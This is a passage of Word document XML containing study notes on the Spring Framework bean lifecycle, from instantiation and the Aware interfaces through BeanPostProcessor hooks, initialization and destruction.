          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00E42DCE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ean </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Life cycle</w:t>
      </w:r>
      <w:r w:rsidR="00E42DCE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="427"/>
    </w:p>
    <w:p w14:paraId="369D50BC" w14:textId="066F8D41" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00F70FEE">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Spring Bean Lifecycle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> refers to the series of steps or stages that a Spring container goes through to manage the lifecycle of a bean from creation to destruction. These steps allow developers to hook into the lifecycle at various stages to perform custom actions, such as initialization or cleanup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2F1E3A" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF404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pring Bean Lifecycle Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A7806B" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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stantiation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F6718C" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18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pring creates an instance of the bean using the no-argument constructor (or a specified constructor if defined). This is done through the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BeanDefinition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> configuration in the Spring container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636ED82E" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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opulate Bean Properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E685220" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18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sets the bean properties from the configuration (XML, annotations, or JavaConfig). This is the stage where dependency injection occurs, and Spring injects values or references into the bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7323614D" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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an Name Aware</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F58B259" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18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the bean implements BeanNameAware, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>setBeanName(String name)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method is called, passing the name of the bean defined in the configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BEBF0B" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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an Factory Aware</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B40A79" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18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bean implements BeanFactoryAware, the setBeanFactory(BeanFactory factory) method is called, giving access to the BeanFactory that created the bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E029900" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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pplicationContext Aware</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B47510" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18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bean implements ApplicationContextAware, the setApplicationContext(ApplicationContext context) method is called, allowing access to the ApplicationContext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FB950C" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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e-Initialization (BeanPostProcessor)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6391A39B" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18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fore any custom initialization method is called, Spring will call the postProcessBeforeInitialization() method of any BeanPostProcessor beans. This allows modifying or wrapping the bean before it is fully initialized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653E5EA1" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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itializing Bean</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C120DB" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18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bean implements InitializingBean, the afterPropertiesSet() method is called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20162749" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18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bean has a custom initialization method (specified in the init-method attribute in XML or @PostConstruct annotation), it will be called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEDD811" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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ost-Initialization (BeanPostProcessor)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B86AEAA" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18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fter the initialization, Spring will call the postProcessAfterInitialization() method of any BeanPostProcessor beans. This allows additional processing or wrapping of the bean after it’s initialized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E762DD" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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an is Ready for Use</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC8671D" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18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bean is now fully initialized and can be used by the Spring container and its clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4628B188" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184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estruction</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222F7AC3" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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the Spring container is shutting down or when the scope of the bean ends (in case of prototype beans), the destruction lifecycle is triggered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128541D7" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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bean implements DisposableBean, the destroy() method is called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3B9506" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184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the bean has a custom destruction method (specified in the destroy-method attribute in XML or @PreDestroy annotation), it will be called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705DD269" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61439764" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03443303" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B2A950E" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5747D947" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="695B3CB4" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB361C3" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="191A3FB8" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AAA3B8D" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D9701E9" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73F35C5C" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46EE8A49" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E06F5AC" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11D0B856" w14:textId="6CF6D345" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF404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pring Bean Lifecycle Diagram:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320C3E07" w14:textId="2EC7F6AA" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00965ED4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="484EAB87" wp14:editId="5241DB94">
            <wp:extent cx="4980676" cy="5931928"/>
            <wp:effectExtent l="57150" t="57150" r="86995" b="88265"/>
            <wp:docPr id="4479478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947898" name="Picture 44794789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96030" cy="595021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6A06DB73" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DF40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AE6FA00">
          <v:rect id="_x0000_i2069" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="241DAB5D" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF404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Interfaces in Bean Lifecycle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2143C76F" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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anNameAware</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4046AD17" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18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with setBeanName(String name) method. The Spring container calls this method to pass the bean's name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726B14EF" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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anFactoryAware</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110EFCE7" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18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with setBeanFactory(BeanFactory factory) method. Provides access to the BeanFactory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0708E8F0" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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pplicationContextAware</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDCE972" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18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with setApplicationContext(ApplicationContext context) method. Provides access to the ApplicationContext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F4A556" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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nitializingBean</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1877B5E0" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18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with afterPropertiesSet() method, called after the bean properties have been set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43891FDA" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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isposableBean</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E97C0FD" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
